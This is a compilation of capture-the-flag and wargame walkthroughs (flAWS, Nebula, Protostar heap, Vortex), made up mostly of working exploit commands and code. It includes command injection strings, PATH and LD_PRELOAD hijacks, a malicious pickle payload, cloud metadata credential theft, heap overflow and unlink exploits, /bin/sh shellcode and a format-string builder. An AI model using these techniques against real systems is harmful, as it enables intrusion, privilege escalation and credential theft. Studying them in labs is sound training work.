
# flAWS challenge


Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@ip
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/

# Nebula


Level 00

$ find / -user flag00 -perm -4000 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
$ /bin/.../flag00
Congrats, now run getflag to get your flag!
$ /bin/getflag
You have successfully executed getflag on a target account

Level 01

$ ln -s /bin/getflag /tmp/echo
$ PATH=/tmp:$PATH
$ /home/flag01/flag01
You have successfully executed getflag on a target account

Level 02

$ USER=';/bin/getflag;#'
$ /home/flag02/flag02
about to call system("/bin/echo ;/bin/getflag;# is cool")

You have successfully executed getflag on a target account

Level 03

$ echo -en '#!/bin/sh\n\n/bin/getflag > /tmp/flag03' > /home/flag03/writable.d/l03.sh
$ cat /tmp/flag03
You have successfully executed getflag on a target account

Level 04

$ ln -s /home/flag04/token /tmp/t0k3n
$ /home/flag04/flag04 /tmp/t0k3n
06508b5e-8909-4f38-b630-fdb148a848a2
$ su -l flag04
Password: 06508b5e-8909-4f38-b630-fdb148a848a2
$ /bin/getflag
You have successfully executed getflag on a target account

Level 05

$ tar xvzf /home/flag05/.backup/backup-19072011.tgz -C /tmp/.
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
$ ssh -i /tmp/.ssh/id_rsa flag05@localhost /bin/getflag
You have successfully executed getflag on a target account

Level 06

$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > /tmp/flag06.pw
$ john /tmp/flag06.pw 
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello            (flag06)
$ su -l flag06
Password: hello
$ /bin/getflag
You have successfully executed getflag on a target account

Level 07

$ nc localhost 7007
GET /index.cgi?Host=localhost|/bin/getflag
Content-type: text/html

<html><head><title>Ping results</title></head><body><pre>
You have successfully executed getflag on a target account
</pre></body></html>

Level 08

$ wireshark capture.pcap
# Follow TCP Stream + Hexdump
000000D6  00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Password: 
000000B9  62 b
000000BA  61 a
000000BB  63 c
000000BC  6b k
000000BD  64 d
000000BE  6f o
000000BF  6f o
000000C0  72 r
000000C1  7f . <DEL>
000000C2  7f . <DEL>
000000C3  7f . <DEL>
000000C4  30 0
000000C5  30 0
000000C6  52 R
000000C7  6d m
000000C8  38 8
000000C9  7f . <DEL>
000000CA  61 a
000000CB  74 t
000000CC  65 e
000000CD  0d .
$ su -l flag08
Password: backd00Rmate
$ /bin/getflag 
You have successfully executed getflag on a target account

Level 09

$ echo '[email ${`/bin/echo;/usr/bin/id;/bin/getflag;/bin/echo`}]' > /tmp/l09
$ /home/flag09/flag09 /tmp/l09
PHP Notice:  Undefined offset: 2 in /home/flag09/flag09.php on line 22
PHP Notice:  Undefined variable: 
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
You have successfully executed getflag on a target account

 in /home/flag09/flag09.php(15) : regexp code on line 1

Level 10

$ nc -v -k -l localhost 18211
$ for i in `seq 1 1000`; do ln -f -s /etc/hostname /tmp/token; /home/flag10/flag10 /tmp/token localhost & ln -f -s /home/flag10/token /tmp/token; done
$ nc -v -k -l localhost 18211
Connection from localhost port 18211 [tcp/*] accepted
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ su -l flag10
Password: 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ /bin/getflag
You have successfully executed getflag on a target account

Level 11

$ PATH=/tmp:$PATH
$ ln -s /bin/getflag /tmp/c
$ cat /tmp/11a.py 
#!/usr/bin/env python
# Emits the "Content-Length" header plus an obfuscated body on stdout; the
# transcript below pipes this into /home/flag11/flag11. Python 2 syntax.

CL = 'Content-Length: '
command = 'c'  # bare name, resolved through PATH (/tmp is prepended above)

payload = command
encrypted = ''

# Byte-wise XOR with a running key: the key starts as the payload length
# (low byte) and, after each byte is emitted, is reduced by that byte's
# value modulo 256, so every output byte depends on all previous input bytes.
key = len(payload) & 0xff
for i in payload:
 encrypted += chr(ord(i) ^ key)
 key -= ord(i)
 key &= 0xff

print CL + str(len(encrypted))
print encrypted
$ chmod +x /tmp/11a.py
$ /tmp/11a.py | /home/flag11/flag11
You have successfully executed getflag on a target account
$ TEMP=/tmp
$ cat /tmp/11b.py 
#!/usr/bin/env python
# Same encoder as 11a.py, but the body is padded to exactly 1024 bytes
# (the program reports "length = 1024" in the run below). Python 2 syntax.

CL = 'Content-Length: '
command = '/bin/getflag;'
comment = '#'
# Filler so that command + comment + padding is 1024 bytes long.
padding = 'A' * (1024 - len(command) - len(comment))

payload = command + comment + padding
encrypted = ''

# Running-key XOR, identical to 11a.py: key = payload length, then
# decremented by each consumed byte, both kept to one byte.
key = len(payload) & 0xff
for i in payload:
 encrypted += chr(ord(i) ^ key)
 key -= ord(i)
 key &= 0xff

print CL + str(len(encrypted))
print encrypted
$ chmod +x /tmp/11b.py
$ /tmp/11b.py | /home/flag11/flag11 
blue = 1024, length = 1024, pink = 1024
You have successfully executed getflag on a target account

Level 12

$  nc localhost 50001 
Password:  4754a4f4bd5787accd33de887b9250a0691dd198; /bin/getflag > /tmp/flag12 # 
Congrats, your token is 413**CARRIER LOST**
$  cat /tmp/flag12 
You have successfully executed getflag on a target account

Level 13

$ cp /home/flag13/flag13 /tmp/.
$ echo 'int getuid() { return 1000; }' > /tmp/libfake.c
$ gcc -shared /tmp/libfake.c -o /tmp/libfake.so
$ LD_PRELOAD=/tmp/libfake.so /tmp/flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
$ su -l flag13
Password: b705702b-76a8-42b0-8844-3adabbe5ac58
$ /bin/getflag
You have successfully executed getflag on a target account

Level 14

$ /home/flag14/flag14 -e
123456
13579;
$ cat /home/flag14/token
857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
$ cat /tmp/l14.py
#!/usr/bin/env python
# Decodes the token passed as argv[1]: the character at position i is
# shifted down by i (mod 255). Each step is echoed, then the result. Python 2.

import sys

token = sys.argv[1]  # no argc check: running without an argument raises IndexError

decrypted = ''
i = 0

for c in token:
 print '[' + c + '] -->',
 # '%' binds tighter than '-', so this is ord(c) - (i % 255).
 r = chr(ord(c) - i % 255)
 print r
 i += 1
 decrypted += r

print decrypted
$ /tmp/l14.py 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
[8] --> 8
[5] --> 4
[7] --> 5
[:] --> 7
[g] --> c
[6] --> 1
[7] --> 1
[?] --> 8
[5] --> -
[A] --> 8
[B] --> 8
[B] --> 7
[o] --> c
[:] --> -
[B] --> 4
[t] --> e
[D] --> 4
[A] --> 0
[?] --> -
[t] --> a
[I] --> 5
[v] --> a
[L] --> 6
[D] --> -
[K] --> 3
[L] --> 3
[{] --> a
[M] --> 2
[Q] --> 5
[P] --> 3
[S] --> 5
[R] --> 3
[Q] --> 1
[W] --> 6
[W] --> 5
[.] --> 

8457c118-887c-4e40-a5a6-33a25353165
$ su -l flag14
Password: 8457c118-887c-4e40-a5a6-33a25353165
$ /bin/getflag
You have successfully executed getflag on a target account

Level 15

$ strace /home/flag15/flag15
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
...
$ cat /tmp/libfake.c 
#define SHELL "/bin/sh"

/* Stand-in for glibc's __libc_start_main: the program's real main is never
 * reached; SHELL is started via system() instead and 0 is returned.
 * system() is used without <stdlib.h>, so it is implicitly declared; every
 * parameter is accepted only to match the real symbol's signature. */
int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
 system(SHELL);
 return 0;
}
$ cat /tmp/version 
GLIBC_2.0{};
$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=/tmp/version,-Bstatic -o /var/tmp/flag15/libc.so.6 /tmp/libfake.c
$ /home/flag15/flag15
$ /bin/getflag
You have successfully executed getflag on a target account

Level 16

$ cat /tmp/L16
#!/bin/bash

/bin/getflag > /tmp/flag16
$ nc localhost 1616
GET /index.cgi?username=`/*/L16`
Content-type: text/html

<html><head><title>Login resuls</title></head><body>Your login failed<br/>Would you like a cookie?<br/><br/></body></html>
$ cat /tmp/flag16
You have successfully executed getflag on a target account

Level 17

$ cat /tmp/l17.py
import os
import pickle
import socket

class GetFlag(object):
 # __reduce__ tells pickle how to reconstruct the object on load: here as a
 # call to os.system(...). Any process that pickle.loads() this blob therefore
 # runs the command — the textbook reason never to unpickle untrusted data
 # (use a data-only format such as JSON, or restrict Unpickler.find_class).
 def __reduce__(self):
  return (os.system, ('/bin/getflag > /tmp/flag17', ))

# Serialised form of GetFlag; it carries the os.system reduction above.
payload = pickle.dumps(GetFlag())

host = 'localhost'
port = 10007

# Deliver the pickle to the listener on localhost:10007 and close; nothing is
# read back. send() is not guaranteed to write every byte — sendall() would be.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(payload)
client.close()
$ python /tmp/l17.py
$ cat /tmp/flag17
You have successfully executed getflag on a target account

Level 18

$ cat /tmp/Starting 
/usr/bin/id
/bin/getflag
$ chmod +x /tmp/Starting
$ PATH=/tmp:$PATH
$ python -c "print 'login me\n'*1021 + 'closelog\n'*1021 + 'shell\n'" | /home/flag18/flag18 --rcfile -d /tmp/debug -v -v -v 2> /dev/null
uid=981(flag18) gid=1019(level18) groups=981(flag18),1019(level18)
You have successfully executed getflag on a target account

Level 19

$ cat /tmp/fork.c
#include <unistd.h>

/* Forks; the parent returns immediately, the child sleeps two seconds and
 * then replaces itself with /home/flag19/flag19, handing it the argv shown.
 * The fork() failure case (-1) is not handled. */
int main(){
 pid_t pid = fork();
 if(pid == 0){
  // Child
  char *path = "/home/flag19/flag19";
  // NOTE: execv requires a NULL-terminated argv; this array has no
  // terminating NULL, so what follows it on the stack is what ends the list.
  char *cmd[] = {"/bin/sh", "-c", "/bin/echo && /usr/bin/id && /bin/getflag"};
  sleep(2);
  execv(path, cmd);  // only returns on failure; the error is not reported
 }
 return 0;  // parent exits at once, leaving the child orphaned
}
$ gcc -o /tmp/fork /tmp/fork.c
$ /tmp/fork
$ 
uid=1020(level19) gid=1020(level19) euid=980(flag19) groups=980(flag19),1020(level19)
You have successfully executed getflag on a target account
$ cat /tmp/fork.py
import os
import time

def child():
 # Wait two seconds (the parent has returned by then), then replace this
 # process image with flag19 using the argv list given. os.execv does not
 # return on success; on failure it raises OSError.
 time.sleep(2)
 os.execv('/home/flag19/flag19', ['/bin/sh', '-c', '/bin/echo && /usr/bin/id && /bin/getflag'])

def parent():
 # Fork: the child runs child(); the parent falls through and returns, so
 # the script ends and the child is orphaned. os.fork() raises OSError on failure.
 pid = os.fork()
 if pid == 0:
  child()

parent()  # entry point: runs at import time, so the file is meant to be executed directly
$ python /tmp/fork.py
$ 
uid=1020(level19) gid=1020(level19) euid=980(flag19) groups=980(flag19),1020(level19)
You have successfully executed getflag on a target account

Reference

https://exploit-exercises.com/nebula/

# Protostar - Heap


Heap 0

$ cat heap0.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

/* 64-byte name buffer; main() fills it with strcpy and no length check. */
struct data {
  char name[64];
};

/* A single function pointer, called at the end of main(). In the run below
 * it is allocated at 0x804a050, directly after the data chunk at 0x804a008. */
struct fp {
  int (*fp)();
};

/* The function the level wants reached; main() never calls it directly. */
void winner()
{
  printf("level passed\n");
}

/* Default callee installed into f->fp by main(). */
void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));  /* neither malloc result is checked */
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  /* BUG (intentional for the exercise): argc is ignored, so argv[1] may be
   * NULL, and strcpy copies it unbounded into the 64-byte d->name — a longer
   * argument runs past the chunk into the f->fp that follows it on the heap.
   * Defensive form: check argc, then copy with a bound of sizeof d->name
   * (strncpy/snprintf) and NUL-terminate. */
  strcpy(d->name, argv[1]);
  
  f->fp();  /* calls whatever f->fp holds at this point */
}
$ file heap0
heap0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap0
(gdb) disassemble main
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
(gdb) b *0x080484f2
(gdb) b *0x080484fd
(gdb) run AAAA
(gdb) x/20xw 0x804a008
0x804a008: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a018: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a028: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a048: 0x00000000 0x00000011 0x08048478 0x00000000
(gdb) c
(gdb) x/20xw 0x804a008
0x804a008: 0x41414141 0x00000000 0x00000000 0x00000000
0x804a018: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a028: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a048: 0x00000000 0x00000011 0x08048478 0x00000000
(gdb) quit
$ ./heap0 `python -c 'from struct import pack; print "A"*(0x804a050-0x804a008) + pack("<I", 0x08048464)'`
data is at 0x804a008, fp is at 0x804a050
level passed

Heap 1

$ cat heap1.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

/* 8-byte record: a priority and a pointer to a separately allocated name. */
struct internet {
  int priority;
  char *name;
};

/* Target function; not called by main(). time() is used without <time.h>
 * (implicit declaration) and printed with %d rather than a time_t format. */
void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;  /* i3 is declared but never used */

  i1 = malloc(sizeof(struct internet));  /* no malloc result is checked */
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  /* BUG (intentional): argc is not checked and both copies are unbounded
   * into 8-byte buffers. A long argv[1] runs out of i1->name into the chunks
   * that follow it — i2 and its name pointer (see the heap dump below) — so
   * the second strcpy then writes argv[2] wherever that pointer now points.
   * Fix: check argc and copy with an 8-byte bound (strncpy/snprintf). */
  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}
$ file heap1
heap1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap1
(gdb) disassemble main
(gdb) p winner
$1 = {void (void)} 0x8048494 <winner>
(gdb) x/i 0x80483cc
0x80483cc <puts@plt>: jmp    DWORD PTR ds:0x8049774
(gdb) x/xw 0x8049774
0x8049774 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483d2
(gdb) b *0x080484ce
(gdb) b *0x080484e8
(gdb) b *0x080484fd
(gdb) b *0x08048517
(gdb) b *0x08048538
(gdb) b *0x08048555
(gdb) b *0x08048561
(gdb) run AAAA BBBB
(gdb) i r eax
eax            0x804a008  134520840
(gdb) c
(gdb) i r eax
eax            0x804a018  134520856
(gdb) c
(gdb) i r eax
eax            0x804a028  134520872
(gdb) c
(gdb) i r eax
eax            0x804a038  13452088
(gdb) c
(gdb) x/16xw 0x804a008
0x804a008:  0x00000001  0x0804a018  0x00000000  0x00000011
0x804a018:  0x00000000  0x00000000  0x00000000  0x00000011
0x804a028:  0x00000002  0x0804a038  0x00000000  0x00000011
0x804a038:  0x00000000  0x00000000  0x00000000  0x00020fc1
(gdb) quit
$ ./heap1 `python -c 'from struct import pack; print "A"*(0x804a02c-0x804a018) + pack("<I", 0x08049774), pack("<I", 0x08048494)'`
and we have a winner @ 1426618179

Heap 2

$ cat heap2.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

/* 36 bytes: a 32-byte name followed by the "logged in" flag that main() tests. */
struct auth {
  char name[32];
  int auth;
};

/* Both start out NULL. auth is freed by "reset" but never set back to NULL. */
struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  /* Command loop over stdin. The defects below are the point of the
   * exercise; the safe form of each is noted inline. */
  while(1) {
      printf("[ auth = %p, service = %p ]\n", auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;
      
      if(strncmp(line, "auth ", 5) == 0) {
          /* BUG: sizeof(auth) is the size of the pointer (4 bytes on this
           * 32-bit build), not sizeof(struct auth) (36), so the chunk is far
           * too small; memset clears the same 4 bytes. malloc is unchecked.
           * Fix: malloc(sizeof(struct auth)) / memset(..., sizeof(struct auth)). */
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          /* The copy is length-checked against name[32], but because the
           * allocation is only 4 bytes it still writes past the chunk. */
          if(strlen(line + 5) < 31) {
              strcpy(auth->name, line + 5);
          }
      }
      if(strncmp(line, "reset", 5) == 0) {
          /* BUG: auth is freed but left dangling, so "login" reads freed
           * memory (use-after-free) and a second "reset" is a double free.
           * Fix: free(auth); auth = NULL; */
          free(auth);
      }
      if(strncmp(line, "service", 6) == 0) {
          /* Only six characters are compared ("servic"). The rest of the line
           * is duplicated into a new chunk sized by the input; in the session
           * below that chunk covers the address `p &auth->auth` reports.
           * strdup's result is not checked. */
          service = strdup(line + 7);
      }
      if(strncmp(line, "login", 5) == 0) {
          /* auth is dereferenced without a NULL check: "login" before any
           * "auth" command dereferences NULL, and after "reset" it reads freed
           * memory. Fix: if(auth && auth->auth) ... */
          if(auth->auth) {
              printf("you have logged in already!\n");
          } else {
              printf("please enter your password\n");
          }
      }
  }
}
$ file heap2  
heap2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap2
(gdb) disassemble main
(gdb) b *0x08048942
(gdb) run
[ auth = (nil), service = (nil) ]
auth AAAA
(gdb) info proc map
process 1682
cmdline = '/opt/protostar/bin/heap2'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap2'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap2
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap2
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0        
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0        
  0xb7fde000 0xb7fe2000     0x4000          0        
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]
(gdb) x/12xw 0x804c000
0x804c000:  0x00000000  0x00000011  0x41414141  0x0000000a
0x804c010:  0x00000000  0x00000ff1  0x00000000  0x00000000
0x804c020:  0x00000000  0x00000000  0x00000000  0x00000000
(gdb) p &auth->name
$1 = (char (*)[32]) 0x804c008
(gdb) p &auth->auth
$2 = (int *) 0x804c028
(gdb) c
[ auth = 0x804c008, service = (nil) ]
serviceAAAABBBBCCCCDDDD
(gdb) x/12xw 0x804c000
0x804c000:  0x00000000  0x00000011  0x41414141  0x0000000a
0x804c010:  0x00000000  0x00000019  0x41414141  0x42424242
0x804c020:  0x43434343  0x44444444  0x0000000a  0x00000fd9
(gdb) x/xw &auth->auth
0x804c028:  0x0000000a
(gdb) c
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!

Heap 3

$ cat heap3.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

/* Target function; never called by main(). time() is used without <time.h>
 * (implicit declaration) and printed with %d rather than a time_t format. */
void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);  /* none of the malloc results are checked */
  b = malloc(32);
  c = malloc(32);

  /* BUG (intentional): argc is never checked and each strcpy is unbounded,
   * so any of argv[1..3] longer than 31 bytes overwrites the header of the
   * neighbouring chunk, which the free() calls below then trust. Fix: check
   * argc and copy with a 32-byte bound (strncpy/snprintf). */
  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  /* Released in reverse allocation order; with corrupted headers it is the
   * allocator's bookkeeping inside free() that goes wrong (the annotated
   * heap dump below shows what the headers are set to). */
  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}
$ file heap3
heap3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap3
(gdb) disassemble main
(gdb) b *0x080488c5
(gdb) p winner
$1 = {void (void)} 0x8048864 
(gdb) run A B C
(gdb) info proc map
process 1784
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap3
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap3
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0        
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0        
  0xb7fe0000 0xb7fe2000     0x2000          0        
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]
(gdb) x/i 0x8048790
0x8048790 <puts@plt>: jmp    DWORD PTR ds:0x804b128
(gdb) x/xw 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048796
(gdb) x/32xw 0x804c000
0x804c000:  0x00000000  0x00000029  0x00000000  0x00000000 shellcode = [push @winner; ret]
0x804c010:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c020:  0x00000000  0x00000000  0x00000000  0x00000029 [-4] [-4]
0x804c030:  0x00000000  0x00000000  0x00000000  0x00000000 [BBBB] [@got_puts - 12] [@shellcode]
0x804c040:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c050:  0x00000000  0x00000029  0x00000000  0x00000000
0x804c060:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c070:  0x00000000  0x00000000  0x00000000  0x00000f89
(gdb) quit
$ ./heap3 `python -c 'from struct import pack; print "A"*4 + "\x68\x64\x88\x04\x08\xc3" + "A"*22 + pack("<I", 0xfffffffc)*2, "B"*4 + pack("<I", 0x0804b128-12) + pack("<I", 0x804c00c), "C"'`
that wasn't too bad now, was it? @ 1426954122

Reference

https://exploit-exercises.com/protostar/

# Vortex wargame: Level 4


# ssh [email protected]
[email protected]'s password:32596d674b313d6a77

$ file /vortex/vortex4
/vortex/vortex4: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=11041f50a7845267e6d05f6f11dd37de0a33d423, not stripped

$ mkdir /tmp/v4
$ cd /tmp/v4
$ cat execve.c 
#include <unistd.h>

/* Executes argv[1] with a NULL argument vector (the started program then
 * sees argc == 0, which is what vortex4's first compare below checks) and a
 * hand-built environment: an empty string, the EGG variable holding a byte
 * sequence written as hex escapes, and argv[2] as the third entry.
 * argc is not checked, so argv[1]/argv[2] may be NULL; execve only returns
 * on failure, and neither that nor main's own return value is handled. */
int main(int argc, char **argv){
 char *env[4];
 env[0]="";
 env[1]="EGG=\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
 env[2]=argv[2];
 env[3]=NULL;
 execve(argv[1], NULL, env);
}
$ gcc -m32 -o execve execve.c
$ cat getenvaddr.c
#include <stdio.h>

/* Prints the address of the EGG environment variable's value, offset by 3.
 * getenv() is used without <stdlib.h> (implicit declaration), and its result
 * is not checked: with EGG unset, ptr is NULL + 3 and printf("%s") on it is
 * undefined behaviour. The +3 adjustment is the author's tuning for the
 * environment layout in the runs below — TODO confirm why 3. */
int main(int argc,char *argv[]){
        char *ptr;
        ptr = getenv("EGG");
 ptr += 3;
        printf("%s will be at %p\n", "EGG", ptr);
        return 0;
}
$ gcc -m32 -o getenvaddr getenvaddr.c
$ cat format_string.py
#!/usr/bin/python

import sys
import struct

def whatprinted(what, printed):
 """Return (pad, total) where pad is the smallest positive count that makes
 printed + pad congruent to `what` modulo 256, and total = printed + pad.

 `what` is bumped by 0x100 until it exceeds `printed`, so pad is always > 0.
 """
 while what <= printed:
  what += 0x100
 what -= printed
 return what, what + printed

def fs_4writes(what, where, printed, init):
 """Build the format string used by the 'exploit' mode below.

 The result is four little-endian addresses (where .. where+3) followed by
 four "%<n>c%<k>$hhn" pairs; the widths come from whatprinted() so that the
 running character count matches each byte of `what` in turn.

 what:    32-bit value to encode, split into bytes b0..b3 (LSB first).
 where:   address of the first byte.
 printed: characters already output before this string starts; the 16
          bytes of addresses are added to it here.
 init:    positional argument index of the first address (init+1..init+3
          for the others).
 Returns a str (Python 2 bytes).
 """
 mask     = 0xff
 printed  = 16 + printed # (4 bytes * 4 where_addresses) + printed
 what_b0  = (what      ) & mask
 what_b1  = (what >>  8) & mask
